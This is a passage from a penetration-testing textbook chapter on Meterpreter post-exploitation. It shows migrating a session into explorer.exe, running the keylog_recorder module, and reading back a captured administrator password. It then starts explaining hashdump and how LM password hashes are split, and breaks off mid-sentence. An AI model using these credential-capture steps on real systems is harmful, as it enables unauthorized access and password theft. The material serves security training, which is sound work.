82
Chapter 6
1476 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1668 explorer.exe x86 0 IHAZSECURITY\Administrator C:\WINDOWS\Explorer.EXE
. . . SNIP . . .
4032 notepad.exe x86 0 IHAZSECURITY\Administrator C:\WINDOWS\system32\notepad.exe
meterpreter > migrate 1668
[*] Migrating to 1668...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
[*] Recording keystrokes...
[*] Saving last few keystrokes...
root@bt:~# cat /root/.msf3/loot/20110324171334_default_192.168.1.195_host.windows.key_179703.txt
Keystroke log started at Thu Mar 24 17:13:34 -0600 2011
administrator password <Back> <Back> <Back> <Back> <Back> <Back> <Back> <Tab> password123!!
Executing ps provides a list of running processes, including explorer.exe. We then issue the migrate command to move our session into the explorer.exe process space. Once that move is complete, we start the keylog_recorder module, stopping it after some time with CTRL-C, and finally, in another terminal window, we dump the contents of the keystroke logger to see what we've caught.
Dumping Usernames and Passwords
In the preceding example, we grabbed password hashes by logging what a user typed. We can also use Meterpreter to obtain the usernames and password hashes on a local file system without the use of keyloggers.
Extracting the Password Hashes
In this attack, we'll leverage the hashdump post exploitation module in Meterpreter to extract the username and password hashes from the system. Microsoft typically stores hashes in the LAN Manager (LM), NT LAN Manager (NTLM), and NT LAN Manager v2 (NTLMv2) formats.
In the case of LM, for example, when a user enters a password for the first time or changes a password, the password is assigned a hash value. Depending on the hash value length, the password can be split into seven-character hashes. For example, if the password is password123456, the hash value could be stored as passwor and d123456, so an attacker would simply need to crack